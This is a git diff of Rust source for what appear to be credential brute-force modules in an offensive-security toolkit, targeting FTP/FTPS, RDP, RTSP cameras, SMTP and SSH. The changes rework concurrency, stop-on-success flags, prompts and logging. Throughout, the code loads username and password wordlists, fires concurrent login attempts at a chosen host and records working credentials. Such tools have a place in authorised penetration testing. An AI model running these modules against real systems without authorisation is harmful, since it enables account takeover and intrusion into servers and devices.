if cpu_usage > 80.0 || ram_used > 0.8 {
sleep(Duration::from_millis(50)).await;
} else if cpu_usage > 60.0 || ram_used > 0.6 {
sleep(Duration::from_millis(25)).await;
} else if running > max_concurrency { // This condition is now less critical for preventing "too many open files"
sleep(Duration::from_millis(10)).await;
} else {
sleep(Duration::from_millis(1)).await;
}
}
/// Format IPv4 or IPv6 addresses with port
fn format_addr(target: &str, port: u16) -> String {
if target.starts_with('[') && target.contains("]:") {
@@ -67,119 +101,110 @@ pub async fn run(target: &str) -> Result<()> {
let addr = format_addr(target, port);
let found = Arc::new(Mutex::new(Vec::new()));
let stop = Arc::new(AtomicBool::new(false));
let stop = Arc::new(Mutex::new(false));
println!("\n[*] Starting brute-force on {}", addr);
let users = load_lines(&usernames_file)?;
if users.is_empty() {
println!("[!] Username wordlist is empty or invalid. Exiting.");
return Ok(());
}
let passes = load_lines(&passwords_file)?;
if passes.is_empty() {
println!("[!] Password wordlist is empty or invalid. Exiting.");
return Ok(());
if !combo_mode && users.is_empty() && !passes.is_empty() {
return Err(anyhow!(
"Username wordlist ('{}') is empty, but password wordlist ('{}') is not. \
Cannot proceed in line-by-line (non-combo) mode as it requires usernames to pair with passwords.",
usernames_file, passwords_file
));
}
// (Optional: notifications for empty lists can remain here)
let mut tasks = FuturesUnordered::new();
if combo_mode {
for user in &users {
if stop_on_success && stop.load(Ordering::Relaxed) { break; }
if *stop.lock().await && stop_on_success { break; }
for pass in &passes {
if stop_on_success && stop.load(Ordering::Relaxed) { break; }
if *stop.lock().await && stop_on_success { break; }
let addr_clone = addr.clone();
let user_clone = user.clone();
let pass_clone = pass.clone();
let found_clone = Arc::clone(&found);
let stop_clone = Arc::clone(&stop);
let semaphore_clone = Arc::clone(&semaphore);
let verbose_flag = verbose;
let stop_on_success_flag = stop_on_success;
let semaphore_clone = Arc::clone(&semaphore); // Clone semaphore for the task
tasks.push(tokio::spawn(async move {
if stop_on_success_flag && stop_clone.load(Ordering::Relaxed) {
return;
}
let permit = match semaphore_clone.acquire_owned().await {
Ok(permit) => permit,
Err(_) => return,
};
if stop_on_success_flag && stop_clone.load(Ordering::Relaxed) {
return;
}
match try_ftp_login(&addr_clone, &user_clone, &pass_clone, verbose_flag).await {
// Acquire a permit. This will block if `concurrency` limit is reached.
let _permit = semaphore_clone.acquire().await.expect("Failed to acquire semaphore permit");
// Proceed with the task logic only after a permit is acquired
if *stop_clone.lock().await && stop_on_success { return; }
match try_ftp_login(&addr_clone, &user_clone, &pass_clone).await {
Ok(true) => {
println!("[+] {} -> {}:{}", addr_clone, user_clone, pass_clone);
found_clone.lock().await.push((addr_clone.clone(), user_clone.clone(), pass_clone.clone()));
if stop_on_success_flag {
stop_clone.store(true, Ordering::Relaxed);
if stop_on_success {
*stop_clone.lock().await = true;
}
}
Ok(false) => {
log(verbose_flag, &format!("[-] {} -> {}:{}", addr_clone, user_clone, pass_clone));
log(verbose, &format!("[-] {} -> {}:{}", addr_clone, user_clone, pass_clone));
}
Err(e) => {
log(verbose_flag, &format!("[!] {}: error: {}", addr_clone, e));
log(verbose, &format!("[!] {}: error: {}", addr_clone, e));
}
}
drop(permit);
// Permit is automatically released when `_permit` goes out of scope here
}));
}
}
} else {
if !users.is_empty() {
} else { // Line-by-line mode
if !users.is_empty() || passes.is_empty() {
for (i, pass) in passes.iter().enumerate() {
if stop_on_success && stop.load(Ordering::Relaxed) { break; }
let user = users.get(i % users.len()).expect("User list modulus logic error").clone();
if *stop.lock().await && stop_on_success { break; }
let user = if users.is_empty() { continue; } else {
users.get(i % users.len()).expect("User list modulus logic error").clone()
};
let addr_clone = addr.clone();
let pass_clone = pass.clone();
let found_clone = Arc::clone(&found);
let stop_clone = Arc::clone(&stop);
let semaphore_clone = Arc::clone(&semaphore);
let verbose_flag = verbose;
let stop_on_success_flag = stop_on_success;
let semaphore_clone = Arc::clone(&semaphore); // Clone semaphore
tasks.push(tokio::spawn(async move {
if stop_on_success_flag && stop_clone.load(Ordering::Relaxed) {
return;
}
let permit = match semaphore_clone.acquire_owned().await {
Ok(permit) => permit,
Err(_) => return,
};
if stop_on_success_flag && stop_clone.load(Ordering::Relaxed) {
return;
}
match try_ftp_login(&addr_clone, &user, &pass_clone, verbose_flag).await {
Ok(true) => {
// Acquire a permit
let _permit = semaphore_clone.acquire().await.expect("Failed to acquire semaphore permit");
if *stop_clone.lock().await && stop_on_success { return; }
match try_ftp_login(&addr_clone, &user, &pass_clone).await {
Ok(true) => {
println!("[+] {} -> {}:{}", addr_clone, user, pass_clone);
found_clone.lock().await.push((addr_clone.clone(), user.clone(), pass_clone.clone()));
if stop_on_success_flag {
stop_clone.store(true, Ordering::Relaxed);
if stop_on_success {
*stop_clone.lock().await = true;
}
}
Ok(false) => {
log(verbose_flag, &format!("[-] {} -> {}:{}", addr_clone, user, pass_clone));
log(verbose, &format!("[-] {} -> {}:{}", addr_clone, user, pass_clone));
}
Err(e) => {
log(verbose_flag, &format!("[!] {}: error: {}", addr_clone, e));
log(verbose, &format!("[!] {}: error: {}", addr_clone, e));
}
}
drop(permit);
// Permit released
}));
}
}
}
let mut processed_tasks_count = 0;
while let Some(res) = tasks.next().await {
dynamic_throttle(processed_tasks_count, concurrency).await; // Still useful for CPU/RAM based throttling
if let Err(e) = res {
log(verbose, &format!("[!] Task panicked (likely due to forced shutdown or internal error): {}", e));
}
processed_tasks_count += 1;
// (stop logic can remain)
}
let creds = found.lock().await;
@@ -211,7 +236,8 @@ pub async fn run(target: &str) -> Result<()> {
Ok(())
}
async fn try_ftp_login(addr: &str, user: &str, pass: &str, verbose: bool) -> Result<bool> {
async fn try_ftp_login(addr: &str, user: &str, pass: &str) -> Result<bool> {
// (try_ftp_login function remains unchanged from your last working version)
// Attempt 1: Plain FTP
match AsyncFtpStream::connect(addr).await {
Ok(mut ftp) => {
@@ -225,15 +251,14 @@ async fn try_ftp_login(addr: &str, user: &str, pass: &str, verbose: bool) -> Res
if msg.contains("530") {
return Ok(false);
} else if msg.contains("550 SSL/TLS required") || msg.contains("TLS required on the control channel") || msg.contains("220 TLS go first") || msg.contains("SSL connection required") {
println!("[i] {} - Plain FTP login indicated TLS required. Attempting FTPS...", addr);
log(true, &format!("[i] {} - Plain FTP login indicated TLS required. Attempting FTPS...", addr));
} else if msg.contains("421") {
println!("[-] {} - Server reported too many connections (421). Sleeping briefly...", addr);
sleep(Duration::from_secs(2)).await;
return Ok(false);
} else {
if verbose {
println!("[!] FTP login error for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, msg, e);
}
// Log network errors if verbose, otherwise they might be too noisy
log(true, &format!("[!] FTP login error for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, msg, e));
return Err(anyhow!("FTP login error: {}", msg));
}
}
@@ -242,30 +267,25 @@ async fn try_ftp_login(addr: &str, user: &str, pass: &str, verbose: bool) -> Res
Err(e) => {
let msg = e.to_string();
if msg.contains("SSL/TLS required") || msg.contains("TLS required on the control channel") || msg.contains("220 TLS go first") || msg.contains("SSL connection required") {
println!("[i] {} - Plain FTP connection indicated TLS required. Attempting FTPS...", addr);
log(true, &format!("[i] {} - Plain FTP connection indicated TLS required. Attempting FTPS...", addr));
} else if msg.contains("421") {
println!("[-] {} - Server reported too many connections during connect (421). Sleeping briefly...", addr);
sleep(Duration::from_secs(2)).await;
return Ok(false);
} else {
if verbose {
println!("[!] FTP connection error to {} ({}:{}): {} - Raw: {:?}", addr, user, pass, msg, e);
}
// Log network errors if verbose
log(true, &format!("[!] FTP connection error to {} ({}:{}): {} - Raw: {:?}", addr, user, pass, msg, e));
return Err(anyhow!("FTP connection error: {}", msg));
}
}
}
// 2️⃣ Only if needed, try FTPS
if verbose {
println!("[i] {} Attempting FTPS login for user '{}'", addr, user);
}
log(true, &format!("[i] {} Attempting FTPS login for user '{}'", addr, user));
let mut ftp_tls = AsyncNativeTlsFtpStream::connect(addr)
.await
.map_err(|e| {
if verbose {
println!("[!] FTPS base connect failed for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, e, e);
}
log(true, &format!("[!] FTPS base connect failed for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, e, e));
anyhow!("FTPS base connect failed: {}", e)
})?;
@@ -285,9 +305,7 @@ async fn try_ftp_login(addr: &str, user: &str, pass: &str, verbose: bool) -> Res
.into_secure(connector, domain)
.await
.map_err(|e| {
if verbose {
println!("[!] TLS upgrade failed for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, e, e);
}
log(true, &format!("[!] TLS upgrade failed for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, e, e));
anyhow!("TLS upgrade failed: {}", e)
})?;
@@ -301,9 +319,7 @@ async fn try_ftp_login(addr: &str, user: &str, pass: &str, verbose: bool) -> Res
if msg.contains("530") {
Ok(false)
} else {
if verbose {
println!("[!] FTPS error for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, msg, e);
}
log(true, &format!("[!] FTPS error for {} ({}:{}): {} - Raw: {:?}", addr, user, pass, msg, e));
Err(anyhow!("FTPS error: {}", msg))
}
}
@@ -315,7 +331,7 @@ async fn try_ftp_login(addr: &str, user: &str, pass: &str, verbose: bool) -> Res
fn prompt_required(msg: &str) -> Result<String> {
loop {
print!("{}", format!("{}: ", msg).cyan().bold());
print!("{}: ", msg);
std::io::stdout().flush()?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -323,12 +339,12 @@ fn prompt_required(msg: &str) -> Result<String> {
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
}
println!("{}", "This field is required.".yellow());
println!("This field is required.");
}
}
fn prompt_default(msg: &str, default: &str) -> Result<String> {
print!("{}", format!("{} [{}]: ", msg, default).cyan().bold());
print!("{} [{}]: ", msg, default);
std::io::stdout().flush()?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -343,7 +359,7 @@ fn prompt_default(msg: &str, default: &str) -> Result<String> {
fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
let default_char = if default_yes { "y" } else { "n" };
loop {
print!("{}", format!("{} (y/n) [{}]: ", msg, default_char).cyan().bold());
print!("{} (y/n) [{}]: ", msg, default_char);
std::io::stdout().flush()?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -352,7 +368,7 @@ fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
"" => return Ok(default_yes),
"y" | "yes" => return Ok(true),
"n" | "no" => return Ok(false),
_ => println!("{}", "Invalid input. Please enter 'y' or 'n'.".yellow()),
_ => println!("Invalid input. Please enter 'y' or 'n'."),
}
}
}
@@ -360,11 +376,7 @@ fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
fn load_lines<P: AsRef<Path>>(path: P) -> Result<Vec<String>> {
let file = File::open(path.as_ref()).map_err(|e| anyhow!("Failed to open file '{}': {}", path.as_ref().display(), e))?;
let reader = BufReader::new(file);
Ok(reader
.lines()
.filter_map(|line| line.ok().map(|s| s.trim().to_string()))
.filter(|line| !line.is_empty())
.collect())
Ok(reader.lines().filter_map(Result::ok).collect())
}
fn log(verbose: bool, msg: &str) {
+5 -6
View File
@@ -1,5 +1,4 @@
use anyhow::Result;
use colored::*;
use std::{
fs::File,
io::{BufRead, BufReader, Write},
@@ -176,7 +175,7 @@ async fn try_rdp_login(addr: &str, user: &str, pass: &str) -> Result<bool> {
fn prompt_required(msg: &str) -> Result<String> {
loop {
print!("{}", format!("{}: ", msg).cyan().bold());
print!("{}: ", msg);
std::io::stdout().flush()?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -184,13 +183,13 @@ fn prompt_required(msg: &str) -> Result<String> {
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
} else {
println!("{}", "This field is required. Please provide a value.".yellow());
println!("This field is required. Please provide a value.");
}
}
}
fn prompt_default(msg: &str, default_val: &str) -> Result<String> {
print!("{}", format!("{} [{}]: ", msg, default_val).cyan().bold());
print!("{} [{}]: ", msg, default_val);
std::io::stdout().flush()?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -205,7 +204,7 @@ fn prompt_default(msg: &str, default_val: &str) -> Result<String> {
fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
let options = if default_yes { "(Y/n)" } else { "(y/N)" };
loop {
print!("{}", format!("{} {} : ", msg, options).cyan().bold());
print!("{} {} : ", msg, options);
std::io::stdout().flush()?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -217,7 +216,7 @@ fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
} else if input == "n" || input == "no" {
return Ok(false);
} else {
println!("{}", "Invalid input. Please enter 'y', 'yes', 'n', or 'no'.".yellow());
println!("Invalid input. Please enter 'y', 'yes', 'n', or 'no'.");
}
}
}
@@ -1,8 +1,6 @@
use anyhow::{anyhow, Result};
use base64::engine::general_purpose::STANDARD as Base64;
use base64::Engine as _;
use colored::*;
use futures::stream::{FuturesUnordered, StreamExt};
use std::{
fs::File,
io::{BufRead, BufReader, Write},
@@ -10,11 +8,10 @@ use std::{
path::{Path, PathBuf},
sync::Arc,
};
use std::sync::atomic::{AtomicBool, Ordering};
use tokio::{
io::{AsyncReadExt, AsyncWriteExt},
net::TcpStream,
sync::{Mutex, Semaphore},
sync::Mutex,
time::{sleep, Duration},
};
@@ -64,151 +61,92 @@ pub async fn run(target: &str) -> Result<()> {
} else {
None
};
let advanced_headers = Arc::new(advanced_headers);
let (addr, implicit_path) = normalize_target_input(target, port)?;
let found = Arc::new(Mutex::new(Vec::new()));
let stop = Arc::new(AtomicBool::new(false));
let semaphore = Arc::new(Semaphore::new(concurrency));
println!("\n[*] Starting brute-force on {}", addr);
let resolved_addrs = match resolve_targets(&addr).await {
Ok(addrs) => Arc::new(addrs),
Err(e) => {
eprintln!("[!] Failed to resolve '{}': {}", addr, e);
return Err(e);
}
};
let users = load_lines(&usernames_file)?;
if users.is_empty() {
println!("[!] Username wordlist is empty or invalid. Exiting.");
return Ok(());
}
let pass_lines: Vec<String> = BufReader::new(File::open(&passwords_file)?)
.lines()
.filter_map(|line| line.ok().map(|s| s.trim().to_string()))
.filter(|line| !line.is_empty())
.collect();
if pass_lines.is_empty() {
println!("[!] Password wordlist is empty or invalid. Exiting.");
return Ok(());
}
let brute_force_paths = prompt_yes_no("Brute force possible RTSP paths (e.g. /stream /live)?", false)?;
let mut paths = if brute_force_paths {
let paths = if brute_force_paths {
let paths_file = prompt_required("Path to RTSP paths file")?;
load_lines(&paths_file)?
} else {
vec!["".to_string()]
};
if paths.is_empty() {
println!("[!] RTSP paths list is empty. Falling back to default root path.");
paths.push(String::new());
}
if let Some(p) = implicit_path {
if !paths.iter().any(|existing| existing == &p) {
paths.insert(0, p);
}
}
let mut tasks = FuturesUnordered::new();
let mut idx = 0usize;
let addr = format!("{}:{}", target, port);
let found = Arc::new(Mutex::new(Vec::new()));
let stop = Arc::new(Mutex::new(false));
println!("\n[*] Starting brute-force on {}", addr);
let users = load_lines(&usernames_file)?;
let pass_lines: Vec<_> = BufReader::new(File::open(&passwords_file)?)
.lines()
.filter_map(Result::ok)
.collect();
let mut idx = 0;
for pass in pass_lines {
if stop_on_success && stop.load(Ordering::Relaxed) {
if *stop.lock().await {
break;
}
let userlist: Vec<String> = if combo_mode {
let userlist = if combo_mode {
users.clone()
} else {
vec![users.get(idx % users.len()).unwrap_or(&users[0]).to_string()]
};
let mut handles = vec![];
for user in userlist {
if stop_on_success && stop.load(Ordering::Relaxed) {
break;
}
for path in &paths {
if stop_on_success && stop.load(Ordering::Relaxed) {
if *stop.lock().await {
break;
}
let addr_clone = addr.clone();
let user_clone = user.clone();
let pass_clone = pass.clone();
let path_clone = path.clone();
let found_clone = Arc::clone(&found);
let stop_clone = Arc::clone(&stop);
let addr = addr.clone();
let user = user.clone();
let pass = pass.clone();
let path = path.clone();
let found = Arc::clone(&found);
let stop = Arc::clone(&stop);
let command = advanced_command.clone();
let headers = Arc::clone(&advanced_headers);
let semaphore_clone = Arc::clone(&semaphore);
let addrs_clone = Arc::clone(&resolved_addrs);
let stop_flag = stop_on_success;
let verbose_flag = verbose;
let headers = advanced_headers.clone();
tasks.push(tokio::spawn(async move {
if stop_flag && stop_clone.load(Ordering::Relaxed) {
return;
}
let permit = match semaphore_clone.acquire_owned().await {
Ok(permit) => permit,
Err(_) => return,
};
if stop_flag && stop_clone.load(Ordering::Relaxed) {
drop(permit);
let handle = tokio::spawn(async move {
if *stop.lock().await {
return;
}
match try_rtsp_login(
addrs_clone.as_slice(),
&addr_clone,
&user_clone,
&pass_clone,
&path_clone,
command.as_deref(),
&headers,
)
.await
{
match try_rtsp_login(&addr, &user, &pass, &path, command.as_deref(), &headers).await {
Ok(true) => {
let path_str = if path_clone.is_empty() { "NO_PATH" } else { &path_clone };
println!("[+] {} -> {}:{} [path={}]", addr_clone, user_clone, pass_clone, path_str);
found_clone
.lock()
.await
.push((addr_clone.clone(), user_clone.clone(), pass_clone.clone(), path_str.to_string()));
if stop_flag {
stop_clone.store(true, Ordering::Relaxed);
let path_str = if path.is_empty() { "NO_PATH" } else { &path };
println!("[+] {} -> {}:{} [path={}]", addr, user, pass, path_str);
found.lock().await.push((addr.clone(), user.clone(), pass.clone(), path_str.to_string()));
if stop_on_success {
*stop.lock().await = true;
}
}
Ok(false) => log(verbose_flag, &format!("[-] {} -> {}:{} [path={}]", addr_clone, user_clone, pass_clone, path_clone)),
Err(e) => log(verbose_flag, &format!("[!] {} -> error: {}", addr_clone, e)),
Ok(false) => log(verbose, &format!("[-] {} -> {}:{} [path={}]", addr, user, pass, path)),
Err(e) => log(verbose, &format!("[!] {} -> error: {}", addr, e)),
}
drop(permit);
sleep(Duration::from_millis(10)).await;
}));
});
if tasks.len() >= concurrency {
if let Some(res) = tasks.next().await {
if let Err(e) = res {
log(verbose, &format!("[!] Task join error: {}", e));
}
handles.push(handle);
if handles.len() >= concurrency {
for h in handles.drain(..) {
let _ = h.await;
}
}
}
}
idx += 1;
}
while let Some(res) = tasks.next().await {
if let Err(e) = res {
log(verbose, &format!("[!] Task join error: {}", e));
for h in handles {
let _ = h.await;
}
idx += 1;
}
let creds = found.lock().await;
@@ -270,24 +208,24 @@ async fn resolve_targets(addr: &str) -> Result<Vec<SocketAddr>> {
/// Attempt RTSP login, trying each resolved address until one succeeds or all fail.
async fn try_rtsp_login(
addrs: &[SocketAddr],
addr_display: &str,
addr: &str,
user: &str,
pass: &str,
path: &str,
method: Option<&str>,
extra_headers: &[String],
) -> Result<bool> {
let addrs = resolve_targets(addr).await?;
let mut last_err = None;
let mut stream = None;
let mut connected_sa: Option<SocketAddr> = None;
let mut connected_sa = None;
// Try each candidate address
for sa in addrs {
match TcpStream::connect(*sa).await {
match TcpStream::connect(sa).await {
Ok(s) => {
stream = Some(s);
connected_sa = Some(*sa);
connected_sa = Some(sa);
break;
}
Err(e) => {
@@ -302,8 +240,7 @@ async fn try_rtsp_login(
(Some(s), Some(sa)) => (s, sa),
_ => {
return Err(anyhow!(
"All connection attempts to {} failed: {}",
addr_display,
"All connection attempts failed: {}",
last_err.map(|e| e.to_string()).unwrap_or_default()
))
}
@@ -341,7 +278,7 @@ async fn try_rtsp_login(
let mut buffer = [0u8; 2048];
let n = stream.read(&mut buffer).await?;
if n == 0 {
return Err(anyhow!("{}: server closed connection unexpectedly.", addr_display));
return Err(anyhow!("Server closed connection unexpectedly."));
}
let response = String::from_utf8_lossy(&buffer[..n]);
@@ -350,78 +287,15 @@ async fn try_rtsp_login(
} else if response.contains("401") || response.contains("403") {
Ok(false)
} else {
Err(anyhow!("{}: unexpected RTSP response:\n{}", addr_display, response))
Err(anyhow!("Unexpected RTSP response:\n{}", response))
}
}
fn normalize_target_input(target: &str, default_port: u16) -> Result<(String, Option<String>)> {
let trimmed = target.trim();
if trimmed.is_empty() {
return Err(anyhow!("Target cannot be empty."));
}
let without_scheme = trimmed.strip_prefix("rtsp://").unwrap_or(trimmed);
let (host_part, path_part) = if let Some((host, path)) = without_scheme.split_once('/') {
(host.trim(), Some(path.to_string()))
} else {
(without_scheme.trim(), None)
};
if host_part.is_empty() {
return Err(anyhow!("Target host cannot be empty."));
}
let normalized_host = if host_part.starts_with('[') {
if host_part.contains("]:") {
host_part.to_string()
} else {
format!("{}:{}", host_part, default_port)
}
} else {
let colon_count = host_part.matches(':').count();
if colon_count == 0 {
format!("{}:{}", host_part, default_port)
} else if colon_count == 1 {
if let Some((host_only, port_str)) = host_part.rsplit_once(':') {
if port_str.parse::<u16>().is_ok() {
if host_only.contains(':') {
format!("[{}]:{}", host_only, port_str)
} else {
host_part.to_string()
}
} else {
format!("{}:{}", host_part, default_port)
}
} else {
format!("{}:{}", host_part, default_port)
}
} else {
format!("[{}]:{}", host_part, default_port)
}
};
let normalized_path = path_part.and_then(|p| {
let truncated = p.split(|c| c == '?' || c == '#').next().unwrap_or_default();
let trimmed = truncated.trim();
if trimmed.is_empty() || trimmed == "/" {
None
} else {
let mut path = trimmed.to_string();
if !path.starts_with('/') {
path.insert(0, '/');
}
Some(path)
}
});
Ok((normalized_host, normalized_path))
}
// ─── Prompt and utility functions unchanged ───────────────────────────────────
fn prompt_required(msg: &str) -> Result<String> {
loop {
print!("{}", format!("{}: ", msg).cyan().bold());
print!("{}: ", msg);
std::io::Write::flush(&mut std::io::stdout())?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -429,12 +303,12 @@ fn prompt_required(msg: &str) -> Result<String> {
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
}
println!("{}", "This field is required.".yellow());
println!("This field is required.");
}
}
fn prompt_default(msg: &str, default: &str) -> Result<String> {
print!("{}", format!("{} [{}]: ", msg, default).cyan().bold());
print!("{} [{}]: ", msg, default);
std::io::Write::flush(&mut std::io::stdout())?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -445,7 +319,7 @@ fn prompt_default(msg: &str, default: &str) -> Result<String> {
fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
let default = if default_yes { "y" } else { "n" };
loop {
print!("{}", format!("{} (y/n) [{}]: ", msg, default).cyan().bold());
print!("{} (y/n) [{}]: ", msg, default);
std::io::Write::flush(&mut std::io::stdout())?;
let mut s = String::new();
std::io::stdin().read_line(&mut s)?;
@@ -453,7 +327,7 @@ fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
"" => return Ok(default_yes),
"y" | "yes" => return Ok(true),
"n" | "no" => return Ok(false),
_ => println!("{}", "Invalid input. Please enter 'y' or 'n'.".yellow()),
_ => println!("Invalid input. Please enter 'y' or 'n'."),
}
}
}
+13 -92
View File
@@ -1,12 +1,9 @@
use anyhow::{anyhow, Context, Result};
use colored::Colorize;
use anyhow::{Result, Context};
use regex::Regex;
use std::fs::{File, OpenOptions};
use std::io::{self, BufRead, BufReader, Write};
use std::net::{TcpStream, ToSocketAddrs};
use std::path::Path;
use std::sync::{Arc, Mutex};
use std::sync::atomic::{AtomicBool, Ordering};
use std::time::Duration;
use telnet::{Telnet, Event};
use threadpool::ThreadPool;
@@ -26,13 +23,13 @@ struct SmtpBruteforceConfig {
pub async fn run(target: &str) -> Result<()> {
println!("\n=== SMTP Bruteforce ===\n");
let port = prompt_port(25);
let username_wordlist = prompt_wordlist("Username wordlist file: ")?;
let password_wordlist = prompt_wordlist("Password wordlist file: ")?;
let threads = prompt_threads(8);
let stop_on_success = prompt_yes_no("Stop on first valid login?", true);
let full_combo = prompt_yes_no("Try every username with every password?", false);
let verbose = prompt_yes_no("Verbose mode?", false);
let port = prompt("Port (default 25): ").parse().unwrap_or(25);
let username_wordlist = prompt("Username wordlist file: ");
let password_wordlist = prompt("Password wordlist file: ");
let threads = prompt("Threads (default 8): ").parse().unwrap_or(8);
let stop_on_success = prompt("Stop on first valid login? (y/n): ").trim().eq_ignore_ascii_case("y");
let full_combo = prompt("Try all combos? (y/n): ").trim().eq_ignore_ascii_case("y");
let verbose = prompt("Verbose? (y/n): ").trim().eq_ignore_ascii_case("y");
let config = SmtpBruteforceConfig {
target: target.to_string(),
port,
@@ -51,12 +48,10 @@ fn run_smtp_bruteforce(config: SmtpBruteforceConfig) -> Result<()> {
let usernames = read_lines(&config.username_wordlist)?;
let passwords = read_lines(&config.password_wordlist)?;
if usernames.is_empty() || passwords.is_empty() {
return Err(anyhow!("Username or password wordlist is empty."));
return Err(anyhow::anyhow!("Empty user or pass wordlist."));
}
println!("[*] Loaded {} username(s).", usernames.len());
println!("[*] Loaded {} password(s).", passwords.len());
let found = Arc::new(Mutex::new(Vec::new()));
let stop_flag = Arc::new(AtomicBool::new(false));
let stop_flag = Arc::new(Mutex::new(false));
let pool = ThreadPool::new(config.threads);
let (tx, rx) = unbounded();
if config.full_combo {
@@ -77,14 +72,14 @@ fn run_smtp_bruteforce(config: SmtpBruteforceConfig) -> Result<()> {
let config = config.clone();
pool.execute(move || {
while let Ok((user, pass)) = rx.recv() {
if stop_flag.load(Ordering::Relaxed) { break; }
if *stop_flag.lock().unwrap() { break; }
if config.verbose { println!("[*] {}:{}", user, pass); }
match try_smtp_login(&addr, &user, &pass) {
Ok(true) => {
println!("[+] VALID: {}:{}", user, pass);
let mut creds = found.lock().unwrap(); creds.push((user.clone(), pass.clone()));
if config.stop_on_success {
stop_flag.store(true, Ordering::Relaxed);
*stop_flag.lock().unwrap() = true;
while rx.try_recv().is_ok() {}
break;
}
@@ -208,81 +203,7 @@ fn save_results(path: &str, creds: &[(String, String)]) -> Result<()> {
}
fn prompt(msg: &str) -> String {
print!("{}", msg);
if let Err(e) = io::stdout().flush() {
eprintln!("[!] Failed to flush stdout: {}", e);
}
let mut b = String::new();
match io::stdin().read_line(&mut b) {
Ok(_) => b.trim().to_string(),
Err(e) => {
eprintln!("[!] Failed to read input: {}", e);
String::new()
}
}
}
fn prompt_port(default: u16) -> u16 {
loop {
let input = prompt(&format!("Port (default {}): ", default));
if input.is_empty() {
return default;
}
match input.parse::<u16>() {
Ok(0) => println!("[!] Port cannot be zero. Please enter a value between 1 and 65535."),
Ok(port) => return port,
Err(_) => println!("[!] Invalid port. Please enter a number between 1 and 65535."),
}
}
}
fn prompt_threads(default: usize) -> usize {
loop {
let input = prompt(&format!("Threads (default {}): ", default));
if input.is_empty() {
return default.max(1);
}
if let Ok(value) = input.parse::<usize>() {
if value >= 1 && value <= 1024 {
return value;
}
}
println!("[!] Invalid thread count. Please enter a value between 1 and 1024.");
}
}
fn prompt_yes_no(message: &str, default_yes: bool) -> bool {
let default_char = if default_yes { "y" } else { "n" };
loop {
let input = prompt(&format!("{} (y/n) [{}]: ", message, default_char));
if input.is_empty() {
return default_yes;
}
match input.to_lowercase().as_str() {
"y" | "yes" => return true,
"n" | "no" => return false,
_ => println!("[!] Please respond with y or n."),
}
}
}
fn prompt_wordlist(message: &str) -> Result<String> {
loop {
let response = prompt(message);
if response.is_empty() {
println!("[!] Path cannot be empty.");
continue;
}
let trimmed = response.trim();
if Path::new(trimmed).is_file() {
return Ok(trimmed.to_string());
} else {
println!(
"{}",
format!("File '{}' does not exist or is not a regular file.", trimmed).yellow()
);
}
}
print!("{}", msg); io::stdout().flush().unwrap(); let mut b = String::new(); io::stdin().read_line(&mut b).unwrap(); b.trim().to_string()
}
fn normalize_target(host: &str, port: u16) -> Result<String> {
+80 -110
View File
@@ -1,17 +1,17 @@
use anyhow::{anyhow, Result};
use colored::*;
use futures::stream::{FuturesUnordered, StreamExt};
use ssh2::Session;
use std::{
fs::File,
io::{BufRead, BufReader, Write},
net::{TcpStream, ToSocketAddrs},
net::TcpStream,
path::{Path, PathBuf},
sync::Arc,
};
use std::sync::atomic::{AtomicBool, Ordering};
use regex::Regex;
use tokio::{sync::Mutex, task::spawn_blocking, time::{sleep, Duration}};
use tokio::{
sync::{Mutex, Semaphore},
task::spawn_blocking,
time::{sleep, Duration},
};
pub async fn run(target: &str) -> Result<()> {
println!("=== SSH Brute Force Module ===");
@@ -25,8 +25,8 @@ pub async fn run(target: &str) -> Result<()> {
}
};
let usernames_file = prompt_existing_file("Username wordlist")?;
let passwords_file = prompt_existing_file("Password wordlist")?;
let usernames_file = prompt_required("Username wordlist")?;
let passwords_file = prompt_required("Password wordlist")?;
let concurrency: usize = loop {
let input = prompt_default("Max concurrent tasks", "10")?;
@@ -46,103 +46,83 @@ pub async fn run(target: &str) -> Result<()> {
let verbose = prompt_yes_no("Verbose mode?", false)?;
let combo_mode = prompt_yes_no("Combination mode? (try every pass with every user)", false)?;
let connect_addr = normalize_target(target, port)?;
let initial_addr = format!("{}:{}", target, port);
let connect_addr = format_host_port(&initial_addr)?;
let found = Arc::new(Mutex::new(Vec::new()));
let stop = Arc::new(AtomicBool::new(false));
let stop = Arc::new(Mutex::new(false));
println!("\n[*] Starting brute-force on {}", connect_addr);
let users = load_lines(&usernames_file)?;
if users.is_empty() {
println!("[!] Username wordlist is empty or invalid. Exiting.");
return Ok(());
}
let passwords = load_lines(&passwords_file)?;
if passwords.is_empty() {
println!("[!] Password wordlist is empty or invalid. Exiting.");
return Ok(());
}
let users = Arc::new(load_lines(&usernames_file)?);
let pass_file = File::open(&passwords_file)?;
let pass_buf = BufReader::new(pass_file);
let pass_lines: Vec<_> = pass_buf.lines().filter_map(Result::ok).collect();
let users = Arc::new(users);
let mut tasks: FuturesUnordered<_> = FuturesUnordered::new();
let mut user_cycle_idx = 0usize;
let semaphore = Arc::new(Semaphore::new(concurrency));
let mut tasks = Vec::new();
let mut user_cycle_idx = 0;
for pass in passwords {
if stop_on_success && stop.load(Ordering::Relaxed) {
for pass_str in pass_lines {
if *stop.lock().await {
break;
}
let selected_users: Vec<String> = if combo_mode {
users.iter().cloned().collect()
